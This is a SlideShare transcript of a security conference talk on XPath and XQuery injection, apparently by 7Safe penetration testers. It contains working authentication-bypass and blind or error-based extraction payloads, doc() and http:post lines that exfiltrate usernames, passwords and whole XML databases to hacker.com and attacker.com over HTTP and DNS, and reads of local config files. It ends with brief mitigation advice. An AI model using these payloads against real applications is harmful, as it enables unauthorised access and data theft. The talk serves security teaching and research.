SlideShare a Scribd company logo

Hacking XPATH 2.0

M
michelemanzotti
Technology
1 of 65
Download to read offline
Hacking  XPATH  2.0     Tom  Forbes   Sumit  Siddharth   7Safe,  UK    
Who  Are  We..   –  Sumit  ‘sid’  Siddharth   •  Head  of  PenetraCon  TesCng  at  7Safe   •  Specialist  in  applicaCon  and  database  security   •  Speaker  at  Black  Hat,  DEF  CON  2009,  2010,   2011     •  Co-­‐author  of  book  SQL  InjecCon,  ATacks  and   Defense  (2nd  ediCon)  
Who  Are  We..   –  Tom  Forbes   •  First  year  University  student     •  Summer  Intern  at  7safe   •  Loves  to  code!  
XPATH:  WHAT  IS  IT?        
What  is  it?   •  Query  language  for  selecCng  nodes  in  an  XML   document   –  Think  SQL  for  XML   •  Two  versions   –  1.0  released  November  1999   –  2.0  released  December  2010  
XPATH’s  XML  Nomenclature   Root  node   Node   Node  value   Comment   Node   Node  name   ATribute  name   ATribute  value  
Why  use  it?   •  XPath  allows  you  to  write  complex  queries   based  upon  pracCcally  anything  in  the  XML   dataset  (aTributes,  children,  other  nodes)   –  Which  allows  you  to  do  stuff  like  unions  and  joins   •  Lots  of  funcCons  for  date,  string  and  number   manipulaCon   –  XPath  2.0  brings  lots  of  new  funcCons  
Examples   •  Return  nodes  based  on  their  children   /Employees/Employee[UserName=‘jbravo’] –  Returns  the  first  employee  in  our  example  (Johnny  Bravo)   •  Return  nodes  based  on  aTributes   /Employees/Employee[@ID=‘2’] –  Returns  the  second  Employee  in  our  database    
Examples   •  Contextual  queries   /Employees/Employee[string-length(FirstName) > 10] –  Returns  all  employees  with  long  first  names   /Employees/Employee[position()<=5] –  Returns  the  first  5  employees   •  FuncCons   Avg(/Employees/Employee/Age) –  Returns  the  average  employee  age   –  Other  funcCons  include  count,  max,  min,  sum    
XPATH  INJECTION  
XPATH  InjecCon   •  Un-­‐validated  users  input  used  in  XPATH  query   •  The  XPATH  query  can  be  altered  to  achieve:   –  AuthenCcaCon  bypass   –  Business  logic  bypass   –  ExtracCon  of  arbitrary  data  from  the  xml  database  
AuthenCcaCon  Bypass   •  AuthenCcaCon  Bypass   –  string(//Employee[username/text()=‘jbravo'  and   password/text()=‘pass123']/account/text())     –  string(//Employee[username/text()=‘jbravo'  or  '1'   =  '1'  and  password/text()=‘anything']/account/ text())     •  Username=‘jbravo’  or  [TRUE  and  FALSE]   –  XPATH  does  not  have  any  comment  characters  
Demo  1   •  AuthenCcaCon  Bypass  
AuthenCcaCon  Bypass  2   •  Oken  password  is  saved  in  encrypted  format   –  string(//Employee[username/text()=‘jbravo'  and   password/ text()=‘5f4dcc3b5aa765d61d8327deb882cf99']/ account/text())     –  Password  field  is  not  vulnerable   –  What  if  we  don’t  know  a  valid  username:  
AuthenCcaCon  Bypass  2...   •  string(//Employee[username/text()=‘non_exisCng’  or   ‘1’=‘1'  and  password/ text()=‘5f4dcc3b5aa765d61d8327deb882cf99']/ account/text())     •  Username=‘non_exisCng’  OR  [TRUE  AND  FALSE]   •  Username=‘non_exisCng’  or  False   •  FALSE  or  FALSE   •  FAIL!  
AuthenCcaCon  Bypass  2   •  string(//Employee[username/text()=‘non_exisCng’  or   ‘1’=‘1’  or  ‘1’=‘1'  and  password/ text()=‘5f4dcc3b5aa765d61d8327deb882cf99']/ account/text())     •  Username=‘non_exisCng’  OR  TRUE  OR    TRUE  AND   FALSE   •  Username=‘non_exisCng’  or  TRUE  or  [TRUE  AND   FALSE]   •  FALSE  or  TRUE  or  FALSE   •  TRUE!  
Blind     XPATH  InjecCon   •  Same  logic  and  SQL  InjecCon   •  True  and  False  pages   •  /Employees/Employee[UserName=‘jbravo'   and  '1'='1'  and  Password=‘mypass’]   –  True  page   •  /Employees/Employee[UserName=‘jbravo'   and  '1'='2'  and  Password=‘mypass’]   –  False  page  
ExploiCng  it   •  No  concept  of  a  user   •  No  concept  of  a  permission   •  No  security  whatsoever   •  Sweet.  
Useful  funcCons   •  count(<node_reference>)   –  Returns  number  of  child  available   •  name(<node_name>)   –  Returns  the  node  name  (e.g.  <firstname>   •  string-­‐length(name(<node_name>))   –  Returns  the  length  of  node  name  (<firstname>=9)     •  substring(name(<node_name>),<posiCon>,<1>)   –  returns  the  characters  from  the  posiCon  in  the  string  
XML  crawling  [1]   Name  of  the  root  node:   name(/*[1])=‘Employees’   Total  number  of  child  nodes:   count(/*[1]/*[1]/*)=6  
XML  crawling  [2]   Find  the  aTribute  name   Finding  child  node  names   name(/*[1]/*[1]/@*[1])=‘ID’   name(/*[1])/*[1])=‘Employee’   Find  the  aTribute  value   Substring(/*[1]/*[1]/@*[1],1,1)=‘1’   Finding  the  value,  if  it  does  not  have  a  child   substring(/*[1]/*[1]/*[1],1,1)=‘J'  
True  And  False  scenario   •  hTp://host/test03.php?username=abaker'  and  '1'='1   –  True  Response   –  /Office/Employee[UserName='abaker‘  and  ‘1’=‘1’]   •  hTp://host/test03.php?username=abaker'  and  '1'=‘2   –  False  Response   •  hTp://host/test03.php?username=abaker'  and  name(/ *[1])=‘EMPLOYEES’  and  '1'='1          response:  True   –  True  Response  means  there  the  root  node  name  is   EMPLOYEES  
Reading  comments  within  XML  file   •  Read  the  comments  from  the  XML  file:   •  hTp://host/?username=abaker'  and  /*[1]/ comment()='comment'    and  '1'='1  
AutomaCng  XPATH  InjecCon   1.  Get  the  name  of  the  node  we  are  fetching   2.  Count  the  aTributes  of  the  node   3.  For  each  aTribute:   a)  Get  the  name   b)  Get  the  value   4.  Retrieve  the  comment  (if  it  exists)   5.  Count  the  number  of  child  nodes   6.  For  each  child  node:   a)  Go  to  step  #1   7.  Get  the  nodes  text  content  
XCat   •  XCat  retrieves  XML  documents  through  blind   XPath  injecCon  vulnerabiliCes   –  WriTen  in  Python   –  Uses  all  the  techniques  described  in  this  talk   –  Designed  to  be  fast   –  Supports  XPath  2.0  features  where  possible   •  More  on  it  later!  
DEMO  2   •  Xcat:  Downloading  the  xml  database  
XPATH  2.0  
XPATH  2.0   •  New  addiCon   •  Lot  more  funcCons   •  Lot  more  fun!  
XPATH  2.0  features..   •  Hugely  increased  feature  set   –  Regular  expressions   –  CondiConals  and  programmaCc  errors     •  allows  blind  error-­‐based  aTacks   –  Overhauled  type  system  (19  types  instead  of  4)   –  Unicode  normalizaCon   –  String  to  code  point  conversion   –  Remote  document  references   •  All  of  these  can  be  uClized  to  speed  up  document   retrieval  and  reduce  the  key  space  we  have  to   search.  
XPATH  2.0  features..   •  Regular  expressions:   matches(string, pattern) •  We  can  use  it  to  see  if  a  string  contains  a  set   of  characters  before  we  begin  retrieval   matches(/Employees/Employee[1]/FirstName/text(), "[A-Z]")
XPATH  2.0  features..   •  Unicode  normalizaCon   –  Breaks  down  (some)  Unicode  characters  into  their   composing  characters.   normalize-unicode(‘é’, "NFKD") -> ‘e`’ –  Speeds  up  document  retrieval  as  unicode  code-­‐ spaces  do  not  have  to  be  searched,  however  data   may  be  lost  as  some  characters  cannot  be   normalized.  
XPath  2.0   •  String  codepoints   String-to-codepoints(“hello”) =(104,101,108,108,111) –  Speeds  up  retrieval,  you  can  just  binary-­‐chop   through  your  specified  range  rather  than  tesCng   each  character  against  every  value  in  the  range  
Checking  XPATH  Version   •  Figure  out  what  version  of  XPath  the  target  is   running:   lower_case(‘A’) == ‘a’ –  FuncCon  introduced  in  XPath  2.0,  will  fail  on  sokware  that   doesn’t  support  XPath  2.0.  
Reducing  the  keyspace   •  Blind  injecCons  are  slow   –  Keyspaces  can  be  huge,  with  unicode  they  can  be   impossibly  large  to  search   –  Searching  this  is  Cme  consuming.   •  XPath  1.0  doesn’t  have  any  funcCons  we  can  use  to   reduce  the  key  space   •  XPath  2.0  has  loads.  
XPath  2.0   •  CondiConals   –  XPath  2.0  has  an  error()  funcCon  we  can  use  to  do   error-­‐based  blind  aTacks:   ' and (if ($payload) then error() else 0) and '1' = '1
Why  we  need  an  error  condiCon   •  Think  of  it  like  Cme  based  SQL  InjecCon   •  ApplicaCon  does  not  return  TRUE  AND  FALSE   pages   –  But  returns  an  error  page  when  the  XPATH  syntax   is  wrong   –  The  FALSE  condiCon  is  now  the  error  page   –  It  does  not  have  to  be  a  xPath  error,  a  generic   error  page  or  string  will  work!  
DEMO  3   •  Error  based  extracCon  
QuesCon   •  Can  we  do  something  similar  in  XPATH  1.0?  
THE  DOC()  FUNCTION......   THE  TROUBLE  STARTS  HERE......  
The  doc()  funcCon   •  Allows  you  to  reference  documents  on  the   file-­‐system   –  Lets  you  do  “cross  file”  joins   –  Also  lets  you  read  arbitrary  XML  file  on  the  system  both   locally  or  remote  and  use  them  inside  expressions:   • count(doc("http://twitter.com/crossdomain.xml”)/*) • doc(“file:///etc/conf/my_config_file.xml”)/*[1]/text()
The  doc()  funcCon   •  This  is  great  for  an  aTacker  in  two  ways:   –  They  can  read  any  parseable  XML  file  on  the  file   system  such  as:   •  Java  config  files   •  Other  XML  databases  
DEMO  4   •  Xcat:  Reading  arbitrary  local  XML  files  
More  fun  with  the  doc()  funcCon   –  We  can  make  the  vulnerable  server  issue  GET   requests  to  aTacker’s  web  server  with  data  from   arbitrary  xml  on  vulnerable  host   •  This  can  be  used  to  speed  up  document  retrieval   •  Make  it  connect  to  our  HTTP  server  and  submit  the   contents  of  XML  document   –  Think  of  it  like  OOB  SQL  InjecCon  exploitaCon  
The  doc()  funcCon  -­‐  HTTP   doc(concat( “http://hacker.com/savedata.py?username=”, encode-for-uri(//Employee[1]/UserName), “&password=“, encode-for-uri(//Employee[1]/Password) ))
The  doc()  funcCon  -­‐  HTTP       1.  XPath   Target   injecCon  with   doc()  payload   ATacker   Series  of   Tubes   3.  HTTP  request  from   2.  Target  server  processes   target  server  containing   the  payload  and  aTempts   data  from  the  database   to  load  the  HTTP  resource   ATacker’s    Web   server  
The  doc()  funcCon   •  Can  be  used  to  retrieve  the  whole  document   very  quickly   –  Only  limit  is  the  max  size  of  a  GET  request  that  the   HTTP  server  accepts   •  Not  always  available  due  to  firewall  rules  or   explicit  disabling  in  the  code    
The  doc()  funcCon  -­‐  DNS   doc(concat(“http://”, encode-for-uri(//Employee[1]/UserName), “.”, encode-for-uri((//Employee[1]/Password), “.hacker.com”))
The  doc()  funcCon  -­‐  DNS       1.  XPath  injecCon  with   doc()  DNS  payload   Target   ATacker   Series  of   Tubes   3.  The  DNS  request  is  read   2.  Target  server  processes   and  logged  by  the  name   the  payload  and  aTempts   server  –  the  first  secCon  is   to  resolve  the  domain   ATackers  nameserver   the  username  and  the  last  is   name   the  password  
The  doc()  funcCon  -­‐  DNS   •  Some  firewalls  may  block  outbound  port   80/443   •  Usually  the  DNS  traffic  is  allowed   •  Some  limitaCons   –  Domain  name  size  limit   –  Character  limitaCons   –  DNS  query  might  get  lost  in  transit  
DNS:  data  ex-­‐filtraCon    doc(concact(  //Employee[1]/ UserName,“.hacker.com”))   •  Will  result  in  a  DNS  query:   –  15:19:04.996744  IP  X.X.X.X.38353  >  Y.Y.Y.Y.53:   15310  A?  jbravo.hacker.com.    
XQuery   •  Query  And  a  programming  language   •  Super  set  of  Xpath   •  Uses  Xpath  expression   •  Supports  FLWOR  expression   –  FOR   –  LET   –  WHERE   –   ORDER  BY   –   RETURN  
XQuery  InjecCon   •  Similar  to  XPath  injecCon   •  ApplicaCon  uses  un-­‐validated  input  in  XQuery   to  query  one  or  more  xml  database   •   More  fun  
Example  
xQuery  Dumper  Script   for  $n  in  /*[1]/*    let  $x  :=  for  $aT  in  $n/@*     return  (concat(name($aT),"=",encode-­‐for-­‐uri($aT)))    let  $y  :=  doc(concat("hTp://hacker.com/?name=",                                                                                                            encode-­‐for-­‐uri(name($n)),                    "&amp;data=",                    encode-­‐for-­‐uri($n/text()),                "&amp;aTr_",                  string-­‐join($x,"&amp;aTr_")))          for  $c  in  $n/child::*      let  $x  :=  for  $aT  in  $c/@*                                                                                                                  return  (concat(name($c),"=",encode-­‐for-­‐uri($c)))      let  $y  :=  doc(concat("hTp://hacker.com/?child=1&amp;name=",                                                                                                                                        encode-­‐for-­‐uri(name($c)),                                                                                                                                        "&amp;data=",                                                                                                                                        encode-­‐for-­‐uri($c/text()),                                                                                                                                      "&amp;aTr_",                                                                                                                                      string-­‐join($x,"&amp;aTr_")))    
One  Query  to  get  them  all...   •  hTp://localhost/viewposts?username=admin%27%5D%0Afor+%24n+in+%2F%2A%5B1%5D%2F%2A%0A%09let+ %24x+%3A%3D+for+%24aT+in+%24n%2F%40%2A+%0A%09%09return+%28concat%28name%28%24aT%29%2C %27%3D%27%2Cencode-­‐for-­‐uri%28%24aT%29%29%29%0A%09let+%24y+%3A%3D+doc%28concat%28%27hTp %3A%2F%hacker.com%2F%3Fname%3D%27%2C+%0A++++++++++++++++++++++++++++++++++++++++++++++++ ++++encode-­‐for-­‐uri%28name%28%24n%29%29%2C+%0A++++++++%27-­‐data%3D%27%2C+%0A++++++++encode-­‐ for-­‐uri%28%24n%2Ftext%28%29%29%2C%0A+++++++%27-­‐aTr_%27%2C+%0A+++++++string-­‐join%28%24x%2C %27-­‐aTr_%27%29%29%29%0A%09%09%0A%09for+%24c+in+%24n%2Fchild%3A%3A%2A%0A%09%09let+%24x+ %3A%3D+for+%24aT+in+%24c%2F%40%2A+%0A+++++++++++++++++++++++++++++++++++++++++++++++++++++ ++return+%28concat%28name%28%24c%29%2C%27%3D%27%2Cencode-­‐for-­‐uri%28%24c%29%29%29%0A %09%09let+%24y+%3A%3D+doc%28concat%28%27hTp%3A%2F%2Fhacker.com%2F%3Fchild%3D1-­‐name%3D %27%2C+%0A++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++encode-­‐for-­‐uri %28name%28%24c%29%29%2C+%0A++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++%27-­‐data%3D%27%2C+%0A+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +encode-­‐for-­‐uri%28%24c%2Ftext%28%29%29%2C%0A++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++%27-­‐aTr_%27%2C%0A+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++string-­‐join%28%24x%2C%27-­‐aTr_%27%29%29%29%0Alet+%24x+%3A%3D+%2F%2A%5B%27  
Demo:  XQuery  InjecCon  
LimitaCons  of  xQuery  injecCon   •  Depends  upon  parser   •  SAXON  parser  wont  entertain  our  one  query   to  get  them  all!   –  Lazy  evaluaCon   •  We  can  rely  on  the  xPath  injecCon  techniques   –  Blind   –  Error  based   –  Out-­‐of-­‐band  channels      
eXist-­‐DB   •  NaCve  XML  database   •  Queries  issued  via  HTTP:   –  hTp://localhost:8080/exist/rest/db/DATABASE/?_query=QUERY   •  We  can  issue  database  calls  within  XPath   expressions  using  the  doc()  funcCon  and  read   the  results  
eXist-­‐DB              Doc(                      concat(“hTp://localhost:8080/exist/rest/db/mydb?_query=”,        encode-­‐for-­‐uri(“doc(‘file:///home/exist/database/conf.xml’)”)                                              )    )   •  This  would  cause  eXist-­‐DB  to  read  its  config  file  and   return  it  as  a  nodeset  which  we  can  manipulate  in   our  query.  
eXist-­‐DB   •  Ships  with  lots  of  useful  modules,  including:   –  HTTP  Client  (enabled  by  default)   –  Email  module   –  LDAP  client   –  Oracle  PL/SQL  stored  procedure  executer   –  File  system  access  
eXist-­‐DB   •  The  HTTP  module  is  enabled  by  default   –  Lets  you  issue  GET  and  POST  requests  from  within   our  query   HTpclient:post(xs:anyURI(“hTp://aTacker.com/”),/*,  false(),  ())  
Hacking  eXist-­‐DB  
PROTECTION  AND  MITIGATION  
ProtecCng  against  XPath  aTacks   •  Same  old!   –  SaniCze  user  input  (duh)   •  Do  you  really  want  me  to  explain  this!   –  Parameterized    queries   •  Separate  data  from  code   •  /root/element[@id=$ID]   –  Limit  the  doc()  funcCon  
Thank  You   •  QuesCons   •  Contact:   sid@pentest.7safe.com   tom@pentest.7safe.com     www.7safe.com    

Recommended

Clean code slide
Clean code slideClean code slide
Clean code slideAnh Huan Miu
 
Clean Code: Chapter 3 Function
Clean Code: Chapter 3 FunctionClean Code: Chapter 3 Function
Clean Code: Chapter 3 FunctionKent Huang
 
UI Programming with Qt-Quick and QML
UI Programming with Qt-Quick and QMLUI Programming with Qt-Quick and QML
UI Programming with Qt-Quick and QMLEmertxe Information Technologies Pvt Ltd
 
Clean code
Clean codeClean code
Clean codeHenrique Smoco
 
Introduction to DOM
Introduction to DOMIntroduction to DOM
Introduction to DOMDaniel Bragais
 
Jquery
JqueryJquery
JqueryGirish Srivastava
 
Xml ppt
Xml pptXml ppt
Xml pptseemadav1
 
Document Object Model (DOM)
Document Object Model (DOM)Document Object Model (DOM)
Document Object Model (DOM)GOPAL BASAK
 

Recommended

Clean code slide
Clean code slideClean code slide
Clean code slideAnh Huan Miu
 
Clean Code: Chapter 3 Function
Clean Code: Chapter 3 FunctionClean Code: Chapter 3 Function
Clean Code: Chapter 3 FunctionKent Huang
 
UI Programming with Qt-Quick and QML
UI Programming with Qt-Quick and QMLUI Programming with Qt-Quick and QML
UI Programming with Qt-Quick and QMLEmertxe Information Technologies Pvt Ltd
 
Clean code
Clean codeClean code
Clean codeHenrique Smoco
 
Introduction to DOM
Introduction to DOMIntroduction to DOM
Introduction to DOMDaniel Bragais
 
Jquery
JqueryJquery
JqueryGirish Srivastava
 
Xml ppt
Xml pptXml ppt
Xml pptseemadav1
 
Document Object Model (DOM)
Document Object Model (DOM)Document Object Model (DOM)
Document Object Model (DOM)GOPAL BASAK
 
Java orientação a objetos (variaveis de instancia e metodos)
Java orientação a objetos (variaveis de instancia e metodos)Java orientação a objetos (variaveis de instancia e metodos)
Java orientação a objetos (variaveis de instancia e metodos)Armando Daniel
 
Clean Code I - Best Practices
Clean Code I - Best PracticesClean Code I - Best Practices
Clean Code I - Best PracticesTheo Jungeblut
 
.NETからActive Directoryデータにアクセス ~ユーザ情報の取得と表示~
.NETからActive Directoryデータにアクセス ~ユーザ情報の取得と表示~.NETからActive Directoryデータにアクセス ~ユーザ情報の取得と表示~
.NETからActive Directoryデータにアクセス ~ユーザ情報の取得と表示~Michio Koyama
 
XSLT 3 for EPUB and Print - Liam R.E. Quin (Barefoot Computing) - ebookcraft ...
XSLT 3 for EPUB and Print - Liam R.E. Quin (Barefoot Computing) - ebookcraft ...XSLT 3 for EPUB and Print - Liam R.E. Quin (Barefoot Computing) - ebookcraft ...
XSLT 3 for EPUB and Print - Liam R.E. Quin (Barefoot Computing) - ebookcraft ...BookNet Canada
 
Java: Regular Expression
Java: Regular ExpressionJava: Regular Expression
Java: Regular ExpressionMasudul Haque
 
PHP - Introduction to Object Oriented Programming with PHP
PHP - Introduction to Object Oriented Programming with PHPPHP - Introduction to Object Oriented Programming with PHP
PHP - Introduction to Object Oriented Programming with PHPVibrant Technologies & Computers
 
Java Input Output (java.io.*)
Java Input Output (java.io.*)Java Input Output (java.io.*)
Java Input Output (java.io.*)Om Ganesh
 
Clean code
Clean codeClean code
Clean codeArturo Herrero
 
Clean code and Code Smells
Clean code and Code SmellsClean code and Code Smells
Clean code and Code SmellsMario Sangiorgio
 
Basic knowledge on html and dhtml
Basic knowledge on html and dhtml Basic knowledge on html and dhtml
Basic knowledge on html and dhtmlSuryakanta Behera
 
INTRODUCTION TO DOM AND DOM TREE
INTRODUCTION TO DOM AND DOM TREEINTRODUCTION TO DOM AND DOM TREE
INTRODUCTION TO DOM AND DOM TREEsystematiclab
 
XSLT.ppt
XSLT.pptXSLT.ppt
XSLT.pptKGSCSEPSGCT
 
jQuery for beginners
jQuery for beginnersjQuery for beginners
jQuery for beginnersArulmurugan Rajaraman
 
Object Oriented Programming In JavaScript
Object Oriented Programming In JavaScriptObject Oriented Programming In JavaScript
Object Oriented Programming In JavaScriptForziatech
 
jQuery
jQueryjQuery
jQueryDileep Mishra
 
clean code book summary - uncle bob - English version
clean code book summary - uncle bob - English versionclean code book summary - uncle bob - English version
clean code book summary - uncle bob - English versionsaber tabatabaee
 
Clean coding-practices
Clean coding-practicesClean coding-practices
Clean coding-practicesJohn Ferguson Smart Limited
 
Dom
Dom Dom
Dom Surinder Kaur
 
Clean code
Clean codeClean code
Clean codeAlvaro García Loaisa
 
Como Apresentar Codigo em Slides - Javou #7 - 2016
Como Apresentar Codigo em Slides - Javou #7 - 2016Como Apresentar Codigo em Slides - Javou #7 - 2016
Como Apresentar Codigo em Slides - Javou #7 - 2016Rafael Ponte
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath InjectionsAMol NAik
 
XPath Injection
XPath InjectionXPath Injection
XPath InjectionRoberto Suggi Liverani
 

More Related Content

What's hot

Java orientação a objetos (variaveis de instancia e metodos)
Java orientação a objetos (variaveis de instancia e metodos)Java orientação a objetos (variaveis de instancia e metodos)
Java orientação a objetos (variaveis de instancia e metodos)Armando Daniel
 
Clean Code I - Best Practices
Clean Code I - Best PracticesClean Code I - Best Practices
Clean Code I - Best PracticesTheo Jungeblut
 
.NETからActive Directoryデータにアクセス ~ユーザ情報の取得と表示~
.NETからActive Directoryデータにアクセス ~ユーザ情報の取得と表示~.NETからActive Directoryデータにアクセス ~ユーザ情報の取得と表示~
.NETからActive Directoryデータにアクセス ~ユーザ情報の取得と表示~Michio Koyama
 
XSLT 3 for EPUB and Print - Liam R.E. Quin (Barefoot Computing) - ebookcraft ...
XSLT 3 for EPUB and Print - Liam R.E. Quin (Barefoot Computing) - ebookcraft ...XSLT 3 for EPUB and Print - Liam R.E. Quin (Barefoot Computing) - ebookcraft ...
XSLT 3 for EPUB and Print - Liam R.E. Quin (Barefoot Computing) - ebookcraft ...BookNet Canada
 
Java: Regular Expression
Java: Regular ExpressionJava: Regular Expression
Java: Regular ExpressionMasudul Haque
 
PHP - Introduction to Object Oriented Programming with PHP
PHP - Introduction to Object Oriented Programming with PHPPHP - Introduction to Object Oriented Programming with PHP
PHP - Introduction to Object Oriented Programming with PHPVibrant Technologies & Computers
 
Java Input Output (java.io.*)
Java Input Output (java.io.*)Java Input Output (java.io.*)
Java Input Output (java.io.*)Om Ganesh
 
Clean code and Code Smells
Clean code and Code SmellsClean code and Code Smells
Clean code and Code SmellsMario Sangiorgio
 
Basic knowledge on html and dhtml
Basic knowledge on html and dhtml Basic knowledge on html and dhtml
Basic knowledge on html and dhtmlSuryakanta Behera
 
INTRODUCTION TO DOM AND DOM TREE
INTRODUCTION TO DOM AND DOM TREEINTRODUCTION TO DOM AND DOM TREE
INTRODUCTION TO DOM AND DOM TREEsystematiclab
 
Object Oriented Programming In JavaScript
Object Oriented Programming In JavaScriptObject Oriented Programming In JavaScript
Object Oriented Programming In JavaScriptForziatech
 
clean code book summary - uncle bob - English version
clean code book summary - uncle bob - English versionclean code book summary - uncle bob - English version
clean code book summary - uncle bob - English versionsaber tabatabaee
 
Como Apresentar Codigo em Slides - Javou #7 - 2016
Como Apresentar Codigo em Slides - Javou #7 - 2016Como Apresentar Codigo em Slides - Javou #7 - 2016
Como Apresentar Codigo em Slides - Javou #7 - 2016Rafael Ponte
 

What's hot (20)

Java orientação a objetos (variaveis de instancia e metodos)
Java orientação a objetos (variaveis de instancia e metodos)Java orientação a objetos (variaveis de instancia e metodos)
Java orientação a objetos (variaveis de instancia e metodos)
 
Clean Code I - Best Practices
Clean Code I - Best PracticesClean Code I - Best Practices
Clean Code I - Best Practices
 
.NETからActive Directoryデータにアクセス ~ユーザ情報の取得と表示~
.NETからActive Directoryデータにアクセス ~ユーザ情報の取得と表示~.NETからActive Directoryデータにアクセス ~ユーザ情報の取得と表示~
.NETからActive Directoryデータにアクセス ~ユーザ情報の取得と表示~
 
XSLT 3 for EPUB and Print - Liam R.E. Quin (Barefoot Computing) - ebookcraft ...
XSLT 3 for EPUB and Print - Liam R.E. Quin (Barefoot Computing) - ebookcraft ...XSLT 3 for EPUB and Print - Liam R.E. Quin (Barefoot Computing) - ebookcraft ...
XSLT 3 for EPUB and Print - Liam R.E. Quin (Barefoot Computing) - ebookcraft ...
 
Java: Regular Expression
Java: Regular ExpressionJava: Regular Expression
Java: Regular Expression
 
PHP - Introduction to Object Oriented Programming with PHP
PHP - Introduction to Object Oriented Programming with PHPPHP - Introduction to Object Oriented Programming with PHP
PHP - Introduction to Object Oriented Programming with PHP
 
Java Input Output (java.io.*)
Java Input Output (java.io.*)Java Input Output (java.io.*)
Java Input Output (java.io.*)
 
Clean code
Clean codeClean code
Clean code
 
Clean code and Code Smells
Clean code and Code SmellsClean code and Code Smells
Clean code and Code Smells
 
Basic knowledge on html and dhtml
Basic knowledge on html and dhtml Basic knowledge on html and dhtml
Basic knowledge on html and dhtml
 
INTRODUCTION TO DOM AND DOM TREE
INTRODUCTION TO DOM AND DOM TREEINTRODUCTION TO DOM AND DOM TREE
INTRODUCTION TO DOM AND DOM TREE
 
XSLT.ppt
XSLT.pptXSLT.ppt
XSLT.ppt
 
jQuery for beginners
jQuery for beginnersjQuery for beginners
jQuery for beginners
 
Object Oriented Programming In JavaScript
Object Oriented Programming In JavaScriptObject Oriented Programming In JavaScript
Object Oriented Programming In JavaScript
 
jQuery
jQueryjQuery
jQuery
 
clean code book summary - uncle bob - English version
clean code book summary - uncle bob - English versionclean code book summary - uncle bob - English version
clean code book summary - uncle bob - English version
 
Clean coding-practices
Clean coding-practicesClean coding-practices
Clean coding-practices
 
Dom
Dom Dom
Dom
 
Clean code
Clean codeClean code
Clean code
 
Como Apresentar Codigo em Slides - Javou #7 - 2016
Como Apresentar Codigo em Slides - Javou #7 - 2016Como Apresentar Codigo em Slides - Javou #7 - 2016
Como Apresentar Codigo em Slides - Javou #7 - 2016
 

Similar to Hacking XPATH 2.0

XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath InjectionsAMol NAik
 
Python RESTful webservices with Python: Flask and Django solutions
Python RESTful webservices with Python: Flask and Django solutionsPython RESTful webservices with Python: Flask and Django solutions
Python RESTful webservices with Python: Flask and Django solutionsSolution4Future
 
Get into Functional Programming with Clojure
Get into Functional Programming with ClojureGet into Functional Programming with Clojure
Get into Functional Programming with ClojureJohn Stevenson
 
Fun with Functional Programming in Clojure
Fun with Functional Programming in ClojureFun with Functional Programming in Clojure
Fun with Functional Programming in ClojureCodemotion
 
(151030) The X files
(151030) The X files(151030) The X files
(151030) The X filesPaul Filkin
 
Fun with Functional Programming in Clojure - John Stevenson - Codemotion Amst...
Fun with Functional Programming in Clojure - John Stevenson - Codemotion Amst...Fun with Functional Programming in Clojure - John Stevenson - Codemotion Amst...
Fun with Functional Programming in Clojure - John Stevenson - Codemotion Amst...Codemotion
 
Declarative Development Using Annotations In PHP
Declarative Development Using Annotations In PHPDeclarative Development Using Annotations In PHP
Declarative Development Using Annotations In PHPStephan Schmidt
 
Declarative Development Using Annotations In PHP
Declarative Development Using Annotations In PHPDeclarative Development Using Annotations In PHP
Declarative Development Using Annotations In PHPstubbles
 
.NET Multithreading/Multitasking
.NET Multithreading/Multitasking.NET Multithreading/Multitasking
.NET Multithreading/MultitaskingSasha Kravchuk
 
SenchaCon 2016: Building a Faceted Catalog of Video Game Assets Using Ext JS ...
SenchaCon 2016: Building a Faceted Catalog of Video Game Assets Using Ext JS ...SenchaCon 2016: Building a Faceted Catalog of Video Game Assets Using Ext JS ...
SenchaCon 2016: Building a Faceted Catalog of Video Game Assets Using Ext JS ...Sencha
 
Nitin Mishra 0301EC201039 Internship PPT.pptx
Nitin Mishra 0301EC201039 Internship PPT.pptxNitin Mishra 0301EC201039 Internship PPT.pptx
Nitin Mishra 0301EC201039 Internship PPT.pptxshivam460694
 
Concurrency and Thread-Safe Data Processing in Background Tasks
Concurrency and Thread-Safe Data Processing in Background TasksConcurrency and Thread-Safe Data Processing in Background Tasks
Concurrency and Thread-Safe Data Processing in Background TasksWO Community
 

Similar to Hacking XPATH 2.0 (20)

XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
 
XPath Injection
XPath InjectionXPath Injection
XPath Injection
 
Python RESTful webservices with Python: Flask and Django solutions
Python RESTful webservices with Python: Flask and Django solutionsPython RESTful webservices with Python: Flask and Django solutions
Python RESTful webservices with Python: Flask and Django solutions
 
Get into Functional Programming with Clojure
Get into Functional Programming with ClojureGet into Functional Programming with Clojure
Get into Functional Programming with Clojure
 
Fun with Functional Programming in Clojure
Fun with Functional Programming in ClojureFun with Functional Programming in Clojure
Fun with Functional Programming in Clojure
 
(151030) The X files
(151030) The X files(151030) The X files
(151030) The X files
 
55j7
55j755j7
55j7
 
Dynamic Python
Dynamic PythonDynamic Python
Dynamic Python
 
Fun with Functional Programming in Clojure - John Stevenson - Codemotion Amst...
Fun with Functional Programming in Clojure - John Stevenson - Codemotion Amst...Fun with Functional Programming in Clojure - John Stevenson - Codemotion Amst...
Fun with Functional Programming in Clojure - John Stevenson - Codemotion Amst...
 
Xml presentation
Xml presentationXml presentation
Xml presentation
 
Xml session
Xml sessionXml session
Xml session
 
Java I/O
Java I/OJava I/O
Java I/O
 
Selenium-Locators
Selenium-LocatorsSelenium-Locators
Selenium-Locators
 
Declarative Development Using Annotations In PHP
Declarative Development Using Annotations In PHPDeclarative Development Using Annotations In PHP
Declarative Development Using Annotations In PHP
 
Declarative Development Using Annotations In PHP
Declarative Development Using Annotations In PHPDeclarative Development Using Annotations In PHP
Declarative Development Using Annotations In PHP
 
.NET Multithreading/Multitasking
.NET Multithreading/Multitasking.NET Multithreading/Multitasking
.NET Multithreading/Multitasking
 
SenchaCon 2016: Building a Faceted Catalog of Video Game Assets Using Ext JS ...
SenchaCon 2016: Building a Faceted Catalog of Video Game Assets Using Ext JS ...SenchaCon 2016: Building a Faceted Catalog of Video Game Assets Using Ext JS ...
SenchaCon 2016: Building a Faceted Catalog of Video Game Assets Using Ext JS ...
 
